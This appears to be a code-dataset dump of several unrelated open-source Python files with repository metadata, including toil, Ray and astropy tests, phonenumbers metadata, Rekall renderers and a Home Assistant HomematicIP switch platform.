data['model'] = 'payment.order'
self._create_attachment(cr, uid, data, context=context)
current.write({'pain_001_file': pain_001_file})
return True
|
BD2KGenomics/toil-old
|
src/toil/test/src/batchJobTest.py
|
Python
|
mit
| 2,389
| 0.01172
|
#!/usr/bin/env python
"""Test Batchjob class
"""
import unittest
import os
from toil.lib.bioio import system
from optparse import OptionParser
from toil.common import setupToil
from toil.job import Job
from toil.test impor
|
t ToilTest
from toil.batchJob import BatchJob
class JobTest(ToilTest):
def setUp(self):
super( JobTest, self ).setUp( )
self.testToil = os.path.join(os.getcwd(), "testJobDir")
parser = OptionParser()
Job.Runner.addToilOptions(parser)
options, args = parser.parse_args()
options.toil = self.testToil
self.contextManager = setupToil(options)
config, batchSystem, jobS
|
tore = self.contextManager.__enter__()
self.jobStore = jobStore
def tearDown(self):
self.contextManager.__exit__(None, None, None)
system("rm -rf %s" % self.testToil)
super( JobTest, self ).tearDown( )
def testJob(self):
"""
Tests functions of a batchjob.
"""
command = "by your command"
memory = 2^32
disk = 2^32
cpu = 1
jobStoreID = 100
remainingRetryCount = 5
predecessorNumber = 0
updateID = 1000
j = BatchJob(command, memory, cpu, disk, jobStoreID, remainingRetryCount,
updateID, predecessorNumber)
#Check attributes
#
self.assertEquals(j.command, command)
self.assertEquals(j.memory, memory)
self.assertEquals(j.disk, disk)
self.assertEquals(j.cpu, cpu)
self.assertEquals(j.jobStoreID, jobStoreID)
self.assertEquals(j.remainingRetryCount, remainingRetryCount)
self.assertEquals(j.predecessorNumber, predecessorNumber)
self.assertEquals(j.updateID, updateID)
self.assertEquals(j.stack, [])
self.assertEquals(j.predecessorsFinished, set())
self.assertEquals(j.logJobStoreFileID, None)
#Check equals function
j2 = BatchJob(command, memory, cpu, disk, jobStoreID, remainingRetryCount,
updateID, predecessorNumber)
self.assertEquals(j, j2)
#Change an attribute and check not equal
j.predecessorsFinished = set(("1", "2"))
self.assertNotEquals(j, j2)
###TODO test other functionality
if __name__ == '__main__':
unittest.main()
|
pcmoritz/ray-1
|
python/ray/tests/test_plasma_unlimited.py
|
Python
|
apache-2.0
| 7,447
| 0
|
import numpy as np
import random
import os
import shutil
import platform
import pytest
import ray
from ray.test_utils import wait_for_condition
from ray.internal.internal_api import memory_summary
MB = 1024 * 1024
def _init_ray():
return ray.init(
num_cpus=2,
object_store_memory=700e6,
_system_config={"plasma_unlimited": True})
def _check_spilled_mb(address, spilled=None, restored=None, fallback=None):
def ok():
s = memory_summary(address=address["redis_address"], stats_only=True)
print(s)
if restored:
if "Restored {} MiB".format(restored) not in s:
return False
else:
if "Restored" in s:
return False
if spilled:
if "Spilled {} MiB".format(spilled) not in s:
return False
else:
if "Spilled" in s:
return False
if fallback:
if "Plasma filesystem mmap usage: {} MiB".format(
fallback) not in s:
return False
else:
if "Plasma filesystem mmap usage:" in s:
return False
return True
wait_for_condition(ok, timeout=3, retry_interval_ms=1000)
@pytest.mark.skipif(
platform.system() == "Windows", reason="Need to fix up for Windows.")
def test_fallback_when_spilling_impossible_on_put():
try:
address = _init_ray()
x1 = ray.put(np.zeros(400 * MB, dtype=np.uint8))
x1p = ray.get(x1)
# x2 will be fallback allocated on the filesystem.
x2 = ray.put(np.zeros(400 * MB, dtype=np.uint8))
x2p = ray.get(x2)
del x1p
del x2p
_check_spilled_mb(address, spilled=None, fallback=400)
finally:
ray.shutdown()
@pytest.mark.skipif(
platform.system() == "Windows", reason="Need to fix up for Windows.")
def test_spilling_when_possible_on_put():
try:
address = _init_ray()
results = []
for _ in range(5):
results.append(ray.put(np.zeros(400 * MB, dtype=np.uint8)))
_check_spilled_mb(address, spilled=1600)
finally:
ray.shutdown()
@pytest.mark.skipif(
platform.system() == "Windows", reason="Need to fix up for Windows.")
def test_fallback_when_spilling_impossible_on_get():
try:
address = _init_ray()
x1 = ray.put(np.zeros(400 * MB, dtype=np.uint8))
# x1 will be spilled.
x2 = ray.put(np.zeros(400 * MB, dtype=np.uint8))
_check_spilled_mb(address, spilled=400)
# x1 will be restored, x2 will be spilled.
x1p = ray.get(x1)
_check_spilled_mb(address, spilled=800, restored=400)
# x2 will be restored, triggering a fallback allocation.
x2p = ray.get(x2)
_check_spilled_mb(address, spilled=800, restored=800, fallback=400)
del x1p
del x2p
finally:
ray.shutdown()
@pytest.mark.skipif(
platform.system() == "Windows", reason="Need to fix up for Windows.")
def test_spilling_when_possible_on_get():
try:
address = _init_ray()
x1 = ray.put(np.zeros(400 * MB, dtype=np.uint8))
# x1 will be spilled.
x2 = ray.put(np.zeros(400 * MB, dtype=np.uint8))
_check_spilled_mb(address, spilled=400)
# x1 will be restored, x2 will be spilled.
ray.get(x1)
_check_spilled_mb(address, spilled=800, restored=400)
# x2 will be restored, spilling x1.
ray.get(x2)
_check_spilled_mb(address, spilled=800, restored=800)
finally:
ray.shutdown()
@pytest.mark.skipif(
platform.system() == "Windows", reason="Need to fix up for Windows.")
def test_task_unlimited():
try:
address = _init_ray()
x1 = ray.put(np.zeros(400 * MB, dtype=np.uint8))
refs = [x1]
# x1 is spilled.
x2 = ray.put(np.zeros(400 * MB, dtype=np.uint8))
x2p = ray.get(x2)
sentinel = ray.put(np.zeros(100 * MB, dtype=np.uint8))
_check_spilled_mb(address, spilled=400)
@ray.remote
def consume(refs):
# triggers fallback allocation, spilling of the sentinel
ray.get(refs[0])
# triggers fallback allocation.
return ray.put(np.zeros(400 * MB, dtype=np.uint8))
# round 1
ray.get(consume.remote(refs))
_check_spilled_mb(address, spilled=500, restor
|
ed=400, fallback=400)
del x2p
del sentinel
finally:
ray.shutdown()
@pytest.mark.skipif(
platform.system() == "Windows", reason="Need to fix up for Windows.")
def test_task_unlimited_multiget
|
_args():
try:
address = _init_ray()
# Too many refs to fit into memory.
refs = []
for _ in range(10):
refs.append(ray.put(np.zeros(200 * MB, dtype=np.uint8)))
x2 = ray.put(np.zeros(600 * MB, dtype=np.uint8))
x2p = ray.get(x2)
_check_spilled_mb(address, spilled=2000)
@ray.remote
def consume(refs):
# Should work without thrashing.
ray.get(refs)
return os.getpid()
ray.get([consume.remote(refs) for _ in range(1000)])
_check_spilled_mb(address, spilled=2000, restored=2000, fallback=2000)
del x2p
finally:
ray.shutdown()
@pytest.mark.skipif(
platform.system() == "Windows", reason="Need to fix up for Windows.")
def test_fd_reuse_no_memory_corruption(shutdown_only):
@ray.remote
class Actor:
def produce(self, i):
s = int(random.random() * 200)
z = np.ones(s * 1024 * 1024)
z[0] = i
return z
def consume(self, x, i):
print(x)
assert x[0] == i, x
ray.init(object_store_memory=100e6)
a = Actor.remote()
b = Actor.remote()
for i in range(20):
x_id = a.produce.remote(i)
ray.get(b.consume.remote(x_id, i))
@pytest.mark.skipif(
platform.system() != "Linux",
reason="Only Linux handles fallback allocation disk full error.")
def test_fallback_allocation_failure(shutdown_only):
ray.init(
object_store_memory=100e6,
_temp_dir="/dev/shm",
_system_config={"plasma_unlimited": True})
shm_size = shutil.disk_usage("/dev/shm").total
object_size = max(100e6, shm_size // 5)
num_exceptions = 0
refs = []
for i in range(8):
try:
refs.append(ray.put(np.zeros(object_size, dtype=np.uint8)))
except ray.exceptions.ObjectStoreFullError:
num_exceptions = num_exceptions + 1
assert num_exceptions > 0
# TODO(ekl) enable this test once we implement this behavior.
# @pytest.mark.skipif(
# platform.system() == "Windows", reason="Need to fix up for Windows.")
# def test_task_unlimited_huge_args():
# try:
# address = _init_ray()
#
# # PullManager should raise an error, since the set of task args is
# # too huge to fit into memory.
# @ray.remote
# def consume(*refs):
# return "ok"
#
# # Too many refs to fit into memory.
# refs = []
# for _ in range(10):
# refs.append(ray.put(np.zeros(200 * MB, dtype=np.uint8)))
#
# with pytest.raises(Exception):
# ray.get(consume.remote(*refs))
# finally:
# ray.shutdown()
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", __file__]))
|
WillisXChen/django-oscar
|
oscar/lib/python2.7/site-packages/phonenumbers/data/region_NF.py
|
Python
|
bsd-3-clause
| 1,648
| 0.010316
|
"""Auto-generated file, do not edit by hand. NF metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_NF = PhoneMetadata(id='NF', country_code=672, international_prefix='00',
general_desc=PhoneNumberDesc(national_number_pattern='[13]\\d{5}', possible_number_pattern='\\d{5,6}'),
fixed_line=PhoneNumberDesc(national_number_pattern='(?:1(?:06|17|28|39)|3[012]\\d)\\d{3}', possible_number_pattern='\\d{5,6}', example_number='106609'),
mobile=PhoneNumberDesc(na
|
tional_number_pattern='38\\d{4}', possible_number_pattern='\\d{5,6}', example_number='381234'),
toll_free=PhoneNumberDesc(n
|
ational_number_pattern='NA', possible_number_pattern='NA'),
premium_rate=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
shared_cost=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
personal_number=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
voip=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
pager=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
uan=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
voicemail=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
no_international_dialling=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
number_format=[NumberFormat(pattern='(\\d{2})(\\d{4})', format='\\1 \\2', leading_digits_pattern=['1']),
NumberFormat(pattern='(\\d)(\\d{5})', format='\\1 \\2', leading_digits_pattern=['3'])])
|
rainaashutosh/MyTestRekall
|
rekall-core/rekall/plugins/renderers/base_objects.py
|
Python
|
gpl-2.0
| 11,403
| 0.000351
|
# -*- coding: utf-8 -*-
# Rekall Memory Forensics
# Copyright 2014 Google Inc. All Rights Reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
"""This module implements base object renderers."""
from rekall import utils
from rekall.ui import renderer as renderer_module
from rekall.ui import text
class PluginObjectTextRenderer(text.TextObjectRenderer):
renders_type = "Plugin"
def render_full(self, target, **_):
return text.Cell(repr(target))
def render_compact(self, target, **_):
return text.Cell(target.name)
class BaseObjectTextRenderer(text.TextObjectRenderer):
renders_type = "BaseObject"
def render_address(self, target, **options):
return text.Cell(
self.format_address(target.obj_offset, **options)
)
def render_full(self, target, **options):
result = text.Cell(unicode(target.v()), **options)
return result
def render_value(self, target, **_):
return text.Cell(unicode(target.v()))
class StringTextRenderer(BaseObjectTextRenderer):
renders_type = "String"
def render_full(self, target, **_):
return text.Cell(
utils.SmartUnicode(target).split("\x00")[0] or u"")
render_value = render_full
render_compact = render_full
class NoneObjectTextRenderer(BaseObjectTextRenderer):
"""NoneObjects will be rendered with a single dash '-'."""
renders_type = "NoneObject"
def render_row(self, target, **_):
return text.Cell("-")
class NoneTextRenderer(NoneObjectTextRenderer):
renders_type = "NoneType"
class UnixTimestampObjectRenderer(BaseObjectTextRenderer):
renders_type = "UnixTimeStamp"
def render_row(self, target, details=False, **options):
if details:
return text.Cell(repr(target))
if target != None:
return text.Cell(unicode(target))
return text.Cell("-")
class PythonBoolTextRenderer(text.TextObjectRenderer):
renders_type = "bool"
def render_full(self, target, **_):
color = "GREEN" if target else "RED"
return text.Cell(
value=unicode(target),
highlights=[(0, -1, color, None)])
render_value = render_full
render_compact = render_full
class NativeTypeTextRenderer(BaseObjectTextRenderer):
renders_type = "NativeType"
def render_address(self, target, width=None, **options):
return text.Cell(
self.format_address(target.v(), **options),
width=width)
class BaseBoolTextRenderer(PythonBoolTextRenderer):
renders_type = "Bool"
def render_row(self, target, **kwargs):
return super(BaseBoolTextRenderer, self).render_row(bool(target),
**kwargs)
class FlagsTextRenderer(BaseObjectTextRenderer):
renders_type = "Flags"
def render_full(self, target, **_):
flags = []
value = target.v()
for k, v in sorted(target.maskmap.items()):
if value & v:
flags.append(k)
return text.Cell(u', '.join(flags))
def render_value(self, target, **_):
return text.Cell(unicode(self.v()))
def render_compact(self, target, **_):
lines = self.render_full(target).lines
if not lines:
return text.Cell("-")
elided = lines[0]
if len(elided) > 40:
elided = elided[:39] + u"…"
return text.Cell(elided)
class EnumerationTextRenderer(BaseObjectTextRenderer):
renders_type = "Enumeration"
def render_full(self, target, **_):
value = target.v()
name = target.choices.get(utils.SmartStr(value), target.default) or (
u"UNKNOWN (%s)" % utils.SmartUnicode(value))
return text.Cell(name)
render_compact = render_full
class DatetimeTextRenderer(text.TextObjectRenderer):
renders_type = "datetime"
def render_row(self, target, **_):
return text.Cell(target.strftime("%Y-%m-%d %H:%M:%S%z"))
class PointerTextRenderer(NativeTypeTextRenderer):
renders_type = "Pointer"
def render_value(self, *args, **kwargs):
return self.render_address(*args, **kwargs)
def render_full(self, target, **_):
target_obj = target.deref()
if target_obj == None:
return text.Cell("-")
delegate_cls = renderer_module.ObjectRenderer.ForTarget(
target_obj, renderer=self.renderer)
return delegate_cls(session=self.session,
renderer=self.renderer).render_full(target_obj)
def render_compact(self, target, **options):
return text.Cell(
"(%s *) %s" % (
target.target,
self.format_address(target.v(), **options))
)
class ListRenderer(text.TextObjectRenderer):
"""Renders a list of other objects."""
renders_type = ("list", "tuple", "set", "frozenset")
def render_row(self, target, **options):
width = options.pop("width", None)
result = []
for item in target:
object_renderer = self.ForTarget(item, self.renderer)(
session=self.session, renderer=self.renderer)
options["wrap"] = False
cell = object_renderer.render_row(item, **options)
result.append("\\n".join(cell.lines).strip())
return text.Cell(", ".join(result), width=width)
class VoidTextRenderer(PointerTextRenderer):
renders_type = "Void"
def render_full(self, target, **options):
return text.Cell(
"(void *) %s" % self.format_address(target.v(), **options))
render_compact = render_full
cl
|
ass FunctionTextRenderer(BaseObjectTextRenderer):
renders_type = "Function"
def render_full(self, target, width=None, **_):
table = text.TextTable(
columns=[
dict(name="Address", style="address"),
dict(name="OpCode", width=16),
dict(name="Op", width=width)
],
renderer=self.renderer,
session=self.session)
result = [
|
]
for instruction in target.disassemble():
result.append(unicode(table.get_row(
instruction.address, instruction.hexbytes, instruction.text)))
return text.Cell("\n".join(result))
def render_compact(self, target, **options):
return text.Cell(self.format_address(target.obj_offset, **options))
render_value = render_compact
class StructTextRenderer(text.TextObjectRenderer):
renders_type = "Struct"
DEFAULT_STYLE = "compact"
renderers = ["TextRenderer", "TestRenderer"]
COLUMNS = None
table = None
def __init__(self, *args, **kwargs):
self.columns = kwargs.pop("columns", self.COLUMNS)
super(StructTextRenderer, self).__init__(*args, **kwargs)
if self.columns:
self.table = text.TextTable(
columns=self.columns,
renderer=self.renderer,
session=self.session)
def render_full(self, target, **_):
"""Full render of a struct outputs every field."""
result = repr(target) + "\n"
width_name = 0
fields = []
# Print all the fields sorted by offset within the struct.
for k in target.members:
width_name = max(width_name, len(k))
obj = getattr(target, k)
if obj == None:
obj = target.m(k)
fields.append(
(getattr(obj, "obj_of
|
RyodoTanaka/Coding_The_Matrix
|
python/chap_1/1.7.7.py
|
Python
|
bsd-3-clause
| 181
| 0.022099
|
#!/
|
usr/bin/env python
# -*- coding: utf-8 -*-
def myConcat(L):
ret=str()
for x in L:
ret+=x
return ret
list=['I ', 'have ', 'a ', 'pen.']
print myConcat(l
|
ist)
|
fabioz/PyDev.Debugger
|
tests_python/test_extract_token.py
|
Python
|
epl-1.0
| 2,852
| 0.009852
|
# coding: utf-8
from __future__ import unicode_literals
from _pydev_bundle._pydev_completer import (isidentifier, extract_token_and_qualifier,
TokenAndQualifier)
from _pydevd_bundle.pydevd_constants import IS_PY2
def test_isidentifier():
assert isidentifier('abc')
assert not isidentifier('<')
assert not isidentifier('')
if IS_PY2:
# Py3 accepts unicode identifiers
assert not isidentifier('áéíóú')
else:
assert isidentifier('áéíóú')
def test_extract_token_and_qualifier():
assert extract_token_and_qualifier('tok', 0, 0) == TokenAndQualifier('', '')
assert extract_token_and_qualifier('tok', 0, 1) == TokenAndQualifier('', 't')
assert extract_token_and_qualifier('tok
|
', 0, 2) == TokenAndQualifier('', 'to')
assert extract_token_and_qualifier('tok', 0, 3) == TokenAndQualifier('', 'tok')
assert extract_token_and_qualifier('tok', 0, 4) == TokenAndQualifier('', 'tok')
assert extract_token_and_qualifier('tok.qual', 0, 0) == TokenAndQualifier('',
|
'')
assert extract_token_and_qualifier('tok.qual', 0, 1) == TokenAndQualifier('', 't')
assert extract_token_and_qualifier('tok.qual', 0, 2) == TokenAndQualifier('', 'to')
assert extract_token_and_qualifier('tok.qual', 0, 3) == TokenAndQualifier('', 'tok')
assert extract_token_and_qualifier('tok.qual', 0, 4) == TokenAndQualifier('tok', '')
assert extract_token_and_qualifier('tok.qual', 0, 5) == TokenAndQualifier('tok', 'q')
assert extract_token_and_qualifier('tok.qual', 0, 6) == TokenAndQualifier('tok', 'qu')
assert extract_token_and_qualifier('tok.qual', 0, 7) == TokenAndQualifier('tok', 'qua')
assert extract_token_and_qualifier('tok.qual', 0, 8) == TokenAndQualifier('tok', 'qual')
# out of range (column)
assert extract_token_and_qualifier('tok.qual.qual2', 0, 100) == TokenAndQualifier('tok.qual', 'qual2')
assert extract_token_and_qualifier('t<ok', 0, 0) == TokenAndQualifier('', '')
assert extract_token_and_qualifier('t<ok', 0, 1) == TokenAndQualifier('', 't')
assert extract_token_and_qualifier('t<ok', 0, 2) == TokenAndQualifier('', '')
assert extract_token_and_qualifier('t<ok', 0, 3) == TokenAndQualifier('', 'o')
assert extract_token_and_qualifier('t<ok', 0, 4) == TokenAndQualifier('', 'ok')
assert extract_token_and_qualifier('a\nt<ok', 1, 0) == TokenAndQualifier('', '')
assert extract_token_and_qualifier('a\nt<ok', 1, 1) == TokenAndQualifier('', 't')
assert extract_token_and_qualifier('a\nt<ok', 1, 2) == TokenAndQualifier('', '')
assert extract_token_and_qualifier('a\nt<ok', 1, 3) == TokenAndQualifier('', 'o')
assert extract_token_and_qualifier('a\nt<ok', 1, 4) == TokenAndQualifier('', 'ok')
# out of range (line)
assert extract_token_and_qualifier('a\nt<ok', 5, 4) == TokenAndQualifier('', '')
|
jabooth/menpo-archive
|
menpo/fitmultilevel/fittingresult.py
|
Python
|
bsd-3-clause
| 13,883
| 0.000288
|
from __future__ import division
import numpy as np
from menpo.transform import Scale
from menpo.visualize.base import GraphPlotter, MultipleImageViewer
from menpo.fit.fittingresult import FittingResult
class MultilevelFittingResult(FittingResult):
r"""
Object that holds the state of a MultipleFitter object (to which it is
linked) after it has fitted a particular image.
Parameters
-----------
image: :class:`menpo.image.masked.MaskedImage`
The fitted image.
multiple_fitter: :class:`menpo.fitter.base.Fitter`
The fitter object used to fitter the image.
fittings: :class:`menpo.fitter.fittingresult.FittingResult` list
A list of basic fitting objects.
affine_correction: :class: `menpo.transforms.affine.Affine`
An affine transform that maps the result of the top resolution
fitting level to the space scale of the original image.
gt_shape: class:`menpo.shape.PointCloud`, optional
The ground truth shape associated to the image.
Default: None
error_type: 'me_norm', 'me' or 'rmse', optional.
Specifies the way in which the error between the fitted and
ground truth shapes is to be computed.
Default: 'me_norm'
"""
def __init__(self, image, multiple_fitter, fittings, affine_correction,
gt_shape=None, error_type='me_norm'):
self._error_stop = None # Internal attribute of error_type setter
self.fittings = fittings
self._affine_correction = affine_correction
super(MultilevelFittingResult, self).__init__(
image, multiple_fitter, gt_shape=gt_shape, error_type=error_type)
@property
def n_levels(self):
r"""
Returns the number of levels of the fitter object.
"""
return self.fitter.n_levels
@property
def downscale(self):
r"""
Returns the downscale factor used by the multiple fitter.
"""
return self.fitter.downscale
@property
def scaled_levels(self):
r"""
Returns True if the shape results returned by the basic fittings
must be scaled.
"""
return self.fitte
|
r.scaled_levels
@property
def fitted(self):
r"""
Returns the fitted state of each fitting object.
"""
return [f.fitted for f in self.fittings
|
]
@FittingResult.error_type.setter
def error_type(self, error_type):
r"""
Sets the error type according to a set of predefined options.
"""
if error_type is 'me_norm':
for f in self.fittings:
f.error_type = error_type
self._error_stop = 0.1
self._error_text = 'Point-to-point error normalized by object ' \
'size'
elif error_type is 'me':
NotImplementedError("erro_type 'me' not implemented yet")
elif error_type is 'rmse':
NotImplementedError("error_type 'rmse' not implemented yet")
else:
raise ValueError("Unknown error_type string selected. Valid"
"options are: 'me_norm', 'me', 'rmse'")
self._error_type = error_type
@property
def n_iters(self):
r"""
Returns the total number of iterations used to fitter the image.
"""
n_iters = 0
for f in self.fittings:
n_iters += f.n_iters
return n_iters
def shapes(self, as_points=False):
r"""
Generates a list containing the shapes obtained at each fitting
iteration.
Parameters
-----------
as_points: boolean, optional
Whether the results is returned as a list of PointClouds or
ndarrays.
Default: False
Returns
-------
shapes: :class:`menpo.shape.PointCoulds or ndarray list
A list containing the shapes obtained at each fitting iteration.
"""
n = self.n_levels - 1
shapes = []
for j, f in enumerate(self.fittings):
if self.scaled_levels:
transform = Scale(self.downscale**(n-j), 2)
for t in f.shapes(as_points=as_points):
transform.apply_inplace(t)
shapes.append(self._affine_correction.apply(t))
else:
for t in f.shapes(as_points=as_points):
shapes.append(self._affine_correction.apply(t))
return shapes
@property
def final_shape(self):
r"""
Returns the final fitted shape.
"""
return self._affine_correction.apply(
self.fittings[-1].final_shape)
@property
def initial_shape(self):
r"""
Returns the initial shape from which the fitting started.
"""
n = self.n_levels - 1
initial_shape = self.fittings[0].initial_shape
if self.scaled_levels:
Scale(self.downscale ** n,
initial_shape.n_dims).apply_inplace(initial_shape)
return self._affine_correction.apply(initial_shape)
@FittingResult.gt_shape.setter
def gt_shape(self, value):
r"""
Setter for the ground truth shape associated to the image.
"""
self._gt_shape = value
def plot_error(self, figure_id=None, new_figure=False, **kwargs):
r"""
Plots the error evolution throughout the fitting.
"""
if self.gt_shape is not None:
title = 'Error evolution'
legend = [self.algorithm]
x_label = 'Number of iterations'
y_label = self._error_text
errors = self.errors
x_limit = self.n_iters + self.n_levels
axis_limits = [0, x_limit, 0, np.max(errors)]
return GraphPlotter(figure_id, new_figure, range(0, x_limit),
[errors], title=title, legend=legend,
x_label=x_label, y_label=y_label,
axis_limits=axis_limits).render(**kwargs)
else:
raise ValueError('Ground truth shape has not been set, error '
'cannot be plotted')
# TODO : this should overwrite __str__
def print_fitting_info(self):
r"""
Prints information related to the fitting.
"""
print "Initial error: {}".format(self.initial_error)
print "Final error: {}".format(self.final_error)
class AAMMultilevelFittingResult(MultilevelFittingResult):
r"""
Object let us recover the state of an AAM Fitter after the latter has
fitted a particular image.
Parameters
-----------
image: :class:`pybug.image.masked.MaskedImage`
The fitted image.
aam_fitter: :class:`pybug.aam.fitter.AAMFitter`
The aam_fitter object used to fitter the image.
basic_fittings: :class:`pybug.aam.fitting.BasicFitting` list
A list of basic fitting objects.
_affine_correction: :class: `pybug.transforms.affine.Affine`
An affine transform that maps the result of the top resolution
fitting level to the space scale of the original image.
gt_shape: class:`pybug.shape.PointCloud`, optional
The ground truth shape associated to the image.
Default: None
error_type: 'me_norm', 'me' or 'rmse', optional.
Specifies the way in which the error between the fitted and
ground truth shapes is to be computed.
Default: 'me_norm'
"""
@property
def residual(self):
r"""
Returns the type of residual used by the basic fitter associated to
each basic fitting.
"""
# TODO: ensure that all basic_fitting residuals are the same?
return self.fittings[-1].residual.type
@property
def costs(self):
r"""
Returns a list containing the cost at each fitting iteration.
"""
raise ValueError('costs not implemented yet.')
#return self._flatten_out([f.costs for f in self.basic_fittings])
@staticmethod
def _flatten_out(list_of_lists):
re
|
MartinHjelmare/home-assistant
|
homeassistant/components/homematicip_cloud/switch.py
|
Python
|
apache-2.0
| 5,355
| 0
|
"""Support for HomematicIP Cloud switches."""
import logging
from homematicip.aio.device import (
AsyncBrandSwitchMeasuring, AsyncFullFlushS
|
witchMeasuring, AsyncMultiIOBox,
|
AsyncOpenCollector8Module, AsyncPlugableSwitch,
AsyncPlugableSwitchMeasuring)
from homematicip.aio.group import AsyncSwitchingGroup
from homeassistant.components.switch import SwitchDevice
from . import DOMAIN as HMIPC_DOMAIN, HMIPC_HAPID, HomematicipGenericDevice
from .device import ATTR_GROUP_MEMBER_UNREACHABLE
_LOGGER = logging.getLogger(__name__)
async def async_setup_platform(
hass, config, async_add_entities, discovery_info=None):
"""Set up the HomematicIP Cloud switch devices."""
pass
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the HomematicIP switch from a config entry."""
home = hass.data[HMIPC_DOMAIN][config_entry.data[HMIPC_HAPID]].home
devices = []
for device in home.devices:
if isinstance(device, AsyncBrandSwitchMeasuring):
# BrandSwitchMeasuring inherits PlugableSwitchMeasuring
# This device is implemented in the light platform and will
# not be added in the switch platform
pass
elif isinstance(device, (AsyncPlugableSwitchMeasuring,
AsyncFullFlushSwitchMeasuring)):
devices.append(HomematicipSwitchMeasuring(home, device))
elif isinstance(device, AsyncPlugableSwitch):
devices.append(HomematicipSwitch(home, device))
elif isinstance(device, AsyncOpenCollector8Module):
for channel in range(1, 9):
devices.append(HomematicipMultiSwitch(home, device, channel))
elif isinstance(device, AsyncMultiIOBox):
for channel in range(1, 3):
devices.append(HomematicipMultiSwitch(home, device, channel))
for group in home.groups:
if isinstance(group, AsyncSwitchingGroup):
devices.append(
HomematicipGroupSwitch(home, group))
if devices:
async_add_entities(devices)
class HomematicipSwitch(HomematicipGenericDevice, SwitchDevice):
"""representation of a HomematicIP Cloud switch device."""
def __init__(self, home, device):
"""Initialize the switch device."""
super().__init__(home, device)
@property
def is_on(self):
"""Return true if device is on."""
return self._device.on
async def async_turn_on(self, **kwargs):
"""Turn the device on."""
await self._device.turn_on()
async def async_turn_off(self, **kwargs):
"""Turn the device off."""
await self._device.turn_off()
class HomematicipGroupSwitch(HomematicipGenericDevice, SwitchDevice):
"""representation of a HomematicIP switching group."""
def __init__(self, home, device, post='Group'):
"""Initialize switching group."""
device.modelType = 'HmIP-{}'.format(post)
super().__init__(home, device, post)
@property
def is_on(self):
"""Return true if group is on."""
return self._device.on
@property
def available(self):
"""Switch-Group available."""
# A switch-group must be available, and should not be affected by the
# individual availability of group members.
# This allows switching even when individual group members
# are not available.
return True
@property
def device_state_attributes(self):
"""Return the state attributes of the switch-group."""
attr = {}
if self._device.unreach:
attr[ATTR_GROUP_MEMBER_UNREACHABLE] = True
return attr
async def async_turn_on(self, **kwargs):
"""Turn the group on."""
await self._device.turn_on()
async def async_turn_off(self, **kwargs):
"""Turn the group off."""
await self._device.turn_off()
class HomematicipSwitchMeasuring(HomematicipSwitch):
"""Representation of a HomematicIP measuring switch device."""
@property
def current_power_w(self):
"""Return the current power usage in W."""
return self._device.currentPowerConsumption
@property
def today_energy_kwh(self):
"""Return the today total energy usage in kWh."""
if self._device.energyCounter is None:
return 0
return round(self._device.energyCounter)
class HomematicipMultiSwitch(HomematicipGenericDevice, SwitchDevice):
"""Representation of a HomematicIP Cloud multi switch device."""
def __init__(self, home, device, channel):
"""Initialize the multi switch device."""
self.channel = channel
super().__init__(home, device, 'Channel{}'.format(channel))
@property
def unique_id(self):
"""Return a unique ID."""
return "{}_{}_{}".format(self.__class__.__name__,
self.post, self._device.id)
@property
def is_on(self):
"""Return true if device is on."""
return self._device.functionalChannels[self.channel].on
async def async_turn_on(self, **kwargs):
"""Turn the device on."""
await self._device.turn_on(self.channel)
async def async_turn_off(self, **kwargs):
"""Turn the device off."""
await self._device.turn_off(self.channel)
|
hnakamur/saklient.python
|
saklient/cloud/errors/dnsaaaarecordnotfoundexception.py
|
Python
|
mit
| 688
| 0.010274
|
# -*- coding:utf-8 -*-
from ...errors.httpbadrequestexception import HttpBadRequestException
import saklient
# module saklient.c
|
loud.errors.dnsaaaarecordnotfoundexception
class DnsAaaaRecordNotFoundException(HttpBadRequestException):
## 不適切な要求です。対応するAAAAレコードが見つかりません。
## @param {int} status
# @param {str} code=None
#
|
@param {str} message=""
def __init__(self, status, code=None, message=""):
super(DnsAaaaRecordNotFoundException, self).__init__(status, code, "不適切な要求です。対応するAAAAレコードが見つかりません。" if message is None or message == "" else message)
|
pllim/astropy
|
astropy/cosmology/tests/test_parameters.py
|
Python
|
bsd-3-clause
| 1,438
| 0.000695
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# STDLIB
from types import MappingProxyType
# THIRD PARTY
import numpy as np
import pytest
# LOCAL
from astropy.cosmology import parameters, realizations
def test_realizations_in_dir():
"""Test the realizations are in ``dir`` of :mod:`astropy.cosmology.parameters`."""
d = dir(parameters)
assert set(d) == set(parameters.__all__)
for n in parameters.available:
assert n in d
@pytest.mark.parametrize("name", parameters.available)
def test_getting_parameters(name):
"""
Test getting 'parameters' and that it is derived from the corresponding
realization.
"""
params = getattr(parameters, name)
assert isinstance(params, MappingProxyType)
assert params["name"] == name
# Check parameters have the right keys and values
cosmo = getattr(realizations, name)
assert params["name"] == cosmo.name
assert params["cosmology"] == cosmo.__class__.__qualname__
# All the cosmology parameters are equal
for n in cosmo.__parameters__:
assert np.array_equal(params[n]
|
, getattr(cosmo, n))
# All the metadata is included. Parameter values take precedence, so only
# checking the keys.
assert set(cosmo.meta.keys()).issubset(params.keys())
# Lastly, check the generation process.
m = cosmo.to_format("mapping", cosmology_as
|
_str=True, move_from_meta=True)
assert params == m
|
shincling/MemNN_and_Varieties
|
DataCoupus/list_document/namelist_question.py
|
Python
|
bsd-3-clause
| 2,479
| 0.003882
|
# -*- coding: utf8 -*-
__author__ = 'shin'
import jieba
namelist_question=[]
